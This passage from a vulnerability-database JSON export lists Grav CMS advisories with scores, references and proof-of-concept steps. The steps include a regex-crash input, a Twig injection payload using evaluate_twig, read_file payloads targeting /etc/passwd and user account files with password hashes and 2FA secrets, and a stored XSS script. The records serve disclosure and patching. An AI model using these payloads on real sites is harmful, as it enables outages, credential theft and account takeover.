support services are core\ncompetencies of X41.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66304","reference_id":"","reference_type":"","scores":[{"value":"0.00071","scoring_system":"epss","scoring_elements":"0.21723","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66304"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T20:15:09Z/"}],"url":"https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-gq3g-666w-7h85","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T20:15:09Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-gq3g-666w-7h85"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66304","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","sco
ring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66304"},{"reference_url":"https://github.com/advisories/GHSA-gq3g-666w-7h85","reference_id":"GHSA-gq3g-666w-7h85","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gq3g-666w-7h85"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66304","GHSA-gq3g-666w-7h85"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9h65-8eka-quhd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30035?format=json","vulnerability_id":"VCID-bdnj-twfh-subp","summary":"Grav vulnerable to Denial of Service via Improper Input Handling in 'Supported' Parameter\n**Endpoint**: `admin/config/system`  \n**Submenu**: `Languages`  \n**Parameter**: `Supported`  \n**Application**: Grav v 1.7.48\n\n---\n\n## Summary\n\nA Denial of Service (DoS) vulnerability was identified in the **\"Languages\"** submenu of the Grav **admin configuration panel** (`/admin/config/system`). Specifically, the `Supported` parameter fails to properly validate user input. 
If a malformed value is inserted—such as a single forward slash (`/`) or an XSS test string—it causes a fatal regular expression parsing error on the server.\n\nThis leads to application-wide failure due to the use of the `preg_match()` function with an **improperly constructed regular expression**, resulting in the following error:\n\n`preg_match(): Unknown modifier 'o' File: /system/src/Grav/Common/Language/Language.php line 244`\n\nOnce triggered, the site becomes completely unavailable to all users.\n\n---\n\n## Details\n\n- **Vulnerable Endpoint**: `POST /admin/config/system`\n    \n- **Submenu**: `Languages`\n    \n- **Parameter**: `Supported`  \n    \n\nThe application dynamically constructs a regular expression using the contents of the `Supported` field without escaping the input using `preg_quote()` or proper validation. This allows attackers to inject invalid syntax into the regex engine, crashing the application during language resolution.\n\n**Stack trace excerpt**:\n\n`Whoops \\ Exception \\ ErrorException (E_WARNING) preg_match(): Unknown modifier 'o' /system/src/Grav/Common/Language/Language.php244`\n\n---\n\n## Proof of Concept (PoC)\n\n### Payloads:\n\n`/ `\n\n### Steps to Reproduce:\n\n1. Log into the Grav Admin Panel.\n    \n2. Navigate to: **Configuration** → **System** → **Languages**.\n    \n3. Locate the `Supported` field.\n    \n4. Insert one of the payloads above (e.g., a single slash `/`).\n    \n5. Click **Save**.\n\n<img width=\"1897\" height=\"639\" alt=\"Pasted image 20250719183223\" src=\"https://github.com/user-attachments/assets/d3a54a20-d30d-46c6-9015-722f80701cfb\" />\n\n1. 
Observe: All pages in the application begin throwing a fatal error and become inaccessible.\n\n<img width=\"1802\" height=\"998\" alt=\"Pasted image 20250719175229\" src=\"https://github.com/user-attachments/assets/b16750c2-507f-4c30-a9bb-d07fa92bb777\" />\n\n---\n\n## Impact\n\n- Application-wide Denial of Service (DoS)\n    \n- All login and admin views crash with the same error\n    \n- Potentially exploitable by:\n    \n    - Admin panel users\n        \n    - CSRF if misconfigured        \n    \n\n---\n\n## References\n\n- **CWE-1333**: Improper Regular Expression\n    \n- **CWE-20**: Improper Input Validation\n\n\n## Discoverer\n\n[Marcelo Queiroz](www.linkedin.com/in/marceloqueirozjr) \n\nby [CVE-Hunters](https://github.com/Sec-Dojo-Cyber-House/cve-hunters)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66305","reference_id":"","reference_type":"","scores":[{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20431","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66305"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2
025-12-02T20:14:17Z/"}],"url":"https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:14:17Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66305","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66305"},{"reference_url":"https://github.com/advisories/GHSA-m8vh-v6r6-w7p6","reference_id":"GHSA-m8vh-v6r6-w7p6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m8vh-v6r6-w7p6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66305","GHSA-m8vh-v6r6-w7p6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerab
ilities/VCID-bdnj-twfh-subp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30102?format=json","vulnerability_id":"VCID-bttg-w7fp-ybd2","summary":"Grav has Broken Access Control which allows an Editor to modify the page's YAML Frontmatter to alter form processing actions\n### Summary\nDue to a broken access control vulnerability in the `/admin/pages/{page_name}` endpoint, an editor (user with full permissions to pages) can change the functionality of a form after submission.\n\n### Details\nDue to improper authorization checks when modifying critical fields on a POST request to `/admin/pages/{page_name}`, an editor with only permissions to change basic content on the form is now able to change the functioning of the form through modifying the content of the `data[_json][header][form]` which is the YAML frontmatter which includes the `process` section which dictates what happens after a user submits the form, which includes some important actions that could lead to further vulnerabilities.\n\n### PoC\n\n- Have Admin and Form plugins installed\n- Connect to panel as admin, create user and give him permission for pages all\n- Now connect as that user and notice you can't edit any process field in the panel\n- Change anything in the content of the form and save\n- Intercept the request:\n![image](https://github.com/user-attachments/assets/a66767d9-648e-45b5-9031-4a15bee3072a)\n\n- Now modify the field `data[_json][header][form]` with the following payload URL-encoded not like this:\n```\n{\"name\":\"ssti-test 2\",\"fields\":{\"name\":{\"type\":\"text\",\"label\":\"Name\",\"required\":true}},\"buttons\":{\"submit\":{\"type\":\"submit\",\"value\":\"Submit\"}},\"process\":[{\"message\":\"{{ evaluate_twig(form.value('name')) }}\"}]}\n```\n\n- Change the field and forward it:\n![image](https://github.com/user-attachments/assets/dd5f95d7-c61f-4fc0-9e9a-e67825f20aea)\n\nRequest goes through and changes have been made to the 
form.\n![image](https://github.com/user-attachments/assets/42a77e10-571b-43a2-8410-14d82dba28e5)\n\n### Impact\n\n- Attacker can modify submission logic of the form which leads to changing redirect value, email sending, changing template, breaking out of the Twig sandbox potentially executing code...\n\n### Fix recommendation\n\n- Implement proper authorization checks to such requests especially when it contains fields user shouldn't be able to modify based on his role.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66301","reference_id":"","reference_type":"","scores":[{"value":"0.29124","scoring_system":"epss","scoring_elements":"0.96666","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66301"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-v8x2-fjv7-8hjh","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T16:26:05Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-v8x2-fjv7-8hjh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66301","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","
scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66301"},{"reference_url":"https://github.com/advisories/GHSA-v8x2-fjv7-8hjh","reference_id":"GHSA-v8x2-fjv7-8hjh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v8x2-fjv7-8hjh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66301","GHSA-v8x2-fjv7-8hjh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bttg-w7fp-ybd2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29383?format=json","vulnerability_id":"VCID-dmbe-mmj8-3baa","summary":"Grav Cross-site Scripting vulnerability\nA cross-site scripting (XSS) vulnerability in Grav v1.7.45 allows attackers to execute arbitrary web scripts or HTML via a crafted 
payload.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-35498","reference_id":"","reference_type":"","scores":[{"value":"0.00152","scoring_system":"epss","scoring_elements":"0.35601","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-35498"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/r4vanan/Stored-xss-Grav-v1.7.45","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-07T15:42:33Z/"}],"url":"https://github.com/r4vanan/Stored-xss-Grav-v1.7.45"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-35498","reference_id":"","reference_type":"","scores":[{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-35498"},{"reference_url":"https://r4vanan.medium.com/a-quick-dive-into-xss-vulnerability-in-grav-cms-v1-7-45-cve-2024-35498-fc236b7d74a0","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_element
s":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-07T15:42:33Z/"}],"url":"https://r4vanan.medium.com/a-quick-dive-into-xss-vulnerability-in-grav-cms-v1-7-45-cve-2024-35498-fc236b7d74a0"},{"reference_url":"https://github.com/advisories/GHSA-m78c-qx99-mvw9","reference_id":"GHSA-m78c-qx99-mvw9","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-m78c-qx99-mvw9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/44327?format=json","purl":"pkg:composer/getgrav/grav@1.7.46","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.46"}],"aliases":["CVE-2024-35498","GHSA-m78c-qx99-mvw9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dmbe-mmj8-3baa"},{"url":"http://public2.vulnerablecode.io/api/vulner
abilities/14905?format=json","vulnerability_id":"VCID-dmh7-xvmg-27ef","summary":"Grav Vulnerable to Arbitrary File Read to Account Takeover\n### Summary\nA low privilege user account with page edit privilege can read any server files using Twig Syntax. This includes Grav user account files - /grav/user/accounts/*.yaml. This file stores hashed user password, 2FA secret, and the password reset token. This can allow an adversary to compromise any registered account by resetting a password for a user to get access to the password reset token from the file or by cracking the hashed password.\n\n### Proof Of Concept\n`{{ read_file('/var/www/html/grav/user/accounts/riri.yaml') }}`\n\nUse the above Twig template syntax in a page and observe that the administrator riri's authentication details are exposed and accessible to any unauthenticated user. \n\n![file-read-2-ATO](https://github.com/getgrav/grav/assets/48800246/9dee4daa-f029-40dd-9646-94c794d3f254)\n\nAs an additional proof of concept for reading system files, observe the `/etc/passwd` file read using the following Twig syntax:\n`{{ read_file('/etc/passwd') }}`\n\n![file-read-etc-passwd](https://github.com/getgrav/grav/assets/48800246/e45de4d4-f81f-42cf-8466-aa36b225ca94)\n\n### Impact\nThis can allow a low privileged user to perform a full account takeover of other registered users including Administrators. 
This can also allow an adversary to read any file in the web server.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34082","reference_id":"","reference_type":"","scores":[{"value":"0.00211","scoring_system":"epss","scoring_elements":"0.43599","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34082"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/b6bba9eb99bf8cb55b8fa8d23f18873ca594e348","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-15T19:34:23Z/"}],"url":"https://github.com/getgrav/grav/commit/b6bba9eb99bf8cb55b8fa8d23f18873ca594e348"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-f8v5-jmfh-pr69","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-15T19:34:23Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-f8v5-jmfh-pr69"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34082","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1"
,"scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34082"},{"reference_url":"https://github.com/advisories/GHSA-f8v5-jmfh-pr69","reference_id":"GHSA-f8v5-jmfh-pr69","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f8v5-jmfh-pr69"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/44327?format=json","purl":"pkg:composer/getgrav/grav@1.7.46","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.46"}],"aliases":["CVE-2024-34082","GHSA-f8v5-jmfh-pr69"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dmh7-xvmg-27ef"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30317?format=json","vulnerability_id":"VCID-dzhh-3xxa-1ycf","summary":"Grav vulnerable to Cross-Site 
Scripting (XSS) Stored endpoint `/admin/pages/[page]` parameter `data[header][template]` in Advanced Tab\n## Summary\n\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/pages/[page]` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[header][template]` parameter. The script is saved within the page's frontmatter and executed automatically whenever the affected content is rendered in the administrative interface or frontend view.\n\n---\n\n## Details\n\n**Vulnerable Endpoint:** `POST /admin/pages/[page]`  \n**Parameter:** `data[header][template]`\n\nThe application fails to properly sanitize user input in the `data[header][template]` field, which is stored in the YAML frontmatter of the page. An attacker can inject JavaScript code using this field, and the payload is rendered and executed when the page is accessed, especially within the Admin Panel interface.\n\n---\n\n## PoC\n\n**Payload:**\n\n`<script>alert('PoC-XXS73')</script>`\n\n### Steps to Reproduce:\n\n1. Log in to the _Grav_ Admin Panel and navigate to **Pages**.\n    \n2. Create a new page or edit an existing one.\n    \n3. In the **Advanced > Template** field (which maps to `data[header][template]`), insert the payload:\n![image](https://github.com/user-attachments/assets/fc92aa09-e363-4422-b577-63aa27097886)\n\n4. Save the page.\n    \n5. Return to the **Pages** section and click on the **three-dot menu** of the affected page: \n![image](https://github.com/user-attachments/assets/ea6a023b-f838-4700-b2a8-8dcfbca37f00)\n\n6. 
The stored XSS payload is triggered, and the script is executed in the browser:\n![image](https://github.com/user-attachments/assets/8cf1cca5-ce8f-4b09-a57c-0848090918ac)\n---\n\n## Impact\n\nStored XSS vulnerabilities can have serious consequences, including:\n\n- **Session hijacking:** Capturing admin session cookies or tokens\n    \n- **Malware delivery:** Executing scripts that load malicious resources\n    \n- **Credential theft:** Creating fake login prompts to steal usernames/passwords\n    \n- **Data exposure:** Reading sensitive metadata or page contents\n    \n- **Privilege escalation:** Performing actions as an authenticated user\n    \n- **Website defacement:** Altering visual or functional elements of the site\n    \n- **Reputation damage:** Undermining user trust in the application\n\nby [CVE-Hunters](https://github.com/Sec-Dojo-Cyber-House/cve-hunters)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66310","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07374","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66310"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/20
25-12-02T16:03:09Z/"}],"url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:03:09Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66310","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66310"},{"reference_url":"https://github.com/advisories/GHSA-7g78-5g5g-mvfj","reference_id":"GHSA-7g78-5g5g-mvfj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7g78-5g5g-mvfj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66310","G